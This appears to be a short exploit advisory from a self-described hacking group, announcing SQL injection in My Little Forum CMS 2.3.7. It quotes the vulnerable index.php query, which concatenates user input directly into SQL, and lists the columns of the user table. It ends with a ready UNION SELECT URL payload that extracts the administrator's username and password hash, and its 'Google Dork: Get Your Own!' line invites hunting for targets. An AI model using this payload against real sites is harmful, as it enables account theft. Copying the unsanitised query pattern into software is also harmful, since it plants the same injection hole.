################################################################################
# Exploit Title:My Little Forum CMS 2.3.7 SQL Injection #
# Google Dork: Get Your Own! #
# Exploit Author:Black Termites Security Group #
# Vendor Homepage:http://mylittleforum.net/ #
# Discovered by: Sh4dow #
# Official Channel:Https://telegram.me/Termites #
# We Are:Sh4dow - SOLTAn SILENT - AVI Hacker - M-R3dH4t - Sorena - HashoR #
##------------------------------------------------------------------------------------------------------------------------##
# GoogleDork: Get your own!
#
# Vulnerable Code (index.php):
#(--> mysqli_query $user_result = mysqli_query($connid, "SELECT user_name FROM " .
#$db_settings['userdata_table'] . " WHERE user_id='" . $selected[$x] . "' LIMIT 1"); <--)
#Tables:(user_type, user_name, user_real_name,
# user_pw, user_email, user_hp, user_location, email_contact, last_login,
# last_logout, user_ip, registered, user_view, fold_threads, signature, profile,
#auto_login_code, pwf_code, activate_code, entries_read)
#
# PoC: http://Site.com/forum/index.php?id=-999' UNION SELECT 0,0,user_name,
# user_pw,0,0,0,0,0,0,0 FROM forum_userdata where user_id=1 /*
#
# <*Iranian Underground Researchers /*>
#################################################################################